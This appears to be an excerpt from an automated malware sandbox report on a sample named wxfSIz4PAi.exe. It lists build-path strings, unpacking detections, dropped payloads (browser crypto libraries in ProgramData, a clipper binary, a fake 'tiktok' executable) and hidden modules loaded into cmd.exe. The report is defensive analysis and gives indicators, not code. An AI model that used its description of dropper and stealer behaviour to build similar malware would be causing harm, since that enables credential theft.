Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920787436.000002727C8D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920330280.000002727C790000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000412E000.00000004.00000020.00020000.00000000.sdmp, wxfSIz4PAi.exe, 00000000.00000000.1609516456.0000000000413000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: EGIJKEHCAK.exe, 00000013.00000000.2121163542.000000000071C000.00000002.00000001.01000000.00000014.sdmp, EGIJKEHCAK.exe, 00000013.00000002.2868926481.000000000071C000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920667291.000002727C8C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920330280.000002727C790000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920667291.000002727C8C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1866972606.0000000003900000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1867218514.0000000003DB7000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1866008850.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163183799.0000000005416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163536288.00000000058F0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292633080.000000000471F000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292037261.0000000004260000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721001C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913908071.000002721BB00000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000412E000.00000004.00000020.00020000.00000000.sdmp, wxfSIz4PAi.exe, 00000000.00000000.1609516456.0000000000413000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\gegedirijeduho_lozome.pdb source: wxfSIz4PAi.exe, 00000000.00000003.1663398442.0000000005D81000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000000.1661539238.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: nss3.pdb source: u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp

Source: wxfSIz4PAi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: wxfSIz4PAi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: wxfSIz4PAi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: wxfSIz4PAi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: wxfSIz4PAi.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Unpacked PE file: 1.2.u5ek.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Unpacked PE file: 0.2.wxfSIz4PAi.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Unpacked PE file: 1.2.u5ek.0.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Code function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00416240

Source: relay.dll.0.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: relay.dll.2.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: jwjqeqx.4.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: tiktok[1].exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: EGIJKEHCAK.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: wxfSIz4PAi.exe	Static PE information: real checksum: 0x7838b should be: 0x7838e

Source: u5ek.3.exe.0.dr	Static PE information: section name: .didata
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0042786C push ecx; ret	0_2_0042787C
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0042780C push eax; ret	0_2_0042782A
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0042E3A5 push esi; ret	0_2_0042E3AE
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_040F74D3 pushad ; retf	0_2_040F74D4
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_040F8568 push ecx; iretd	0_2_040F856E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_040F9D81 pushad ; retf	0_2_040F9D88
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_040FB7F3 push ebp; iretd	0_2_040FB826
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_040F9A6B push 2B991403h; ret	0_2_040F9A72
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_040FA391 push 00000061h; retf	0_2_040FA399
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B69F6D push ecx; ret	0_2_05B69F80
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B7C9FD push esp; retf	0_2_05B7C9FE
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B7C3FF push esp; retf	0_2_05B7C407
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B81B72 push dword ptr [esp+ecx-75h]; iretd	0_2_05B81B76
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B69A1D push ecx; ret	0_2_05B69A30
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B87A73 push eax; ret	0_2_05B87A91
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_004176C5 push ecx; ret	1_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBAB536 push ecx; ret	1_2_6BBAB549
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_0018281F push esp; retn 0031h	2_2_00182820
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_00181088 push esp; retn 0031h	2_2_00181089
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_002DFAB6 push ecx; ret	2_2_002DFAC9
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_002DFB55 push ecx; ret	2_2_002DFB68
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_00181DA3 push esp; retn 0031h	2_2_00181DA4
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_00190F0B push 8B0034D1h; retf	2_2_00190F10
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_0017EF7F push esp; retf 0031h	2_2_0017EF80
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_0017EFA7 push eax; retf 0031h	2_2_0017EFA8

Source: jwjqeqx.4.dr

Static PE information: section name: .text entropy: 6.816444465715168

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\xtfky	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File created: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File created: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Jump to dropped file
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File created: C:\Users\user\AppData\Local\Temp\u5ek.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\jwjqeqx	Jump to dropped file
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File created: C:\Users\user\AppData\Local\Temp\u5ek.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\jwjqeqx			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\xtfky			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JWJQEQX
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\XTFKY

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408761

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
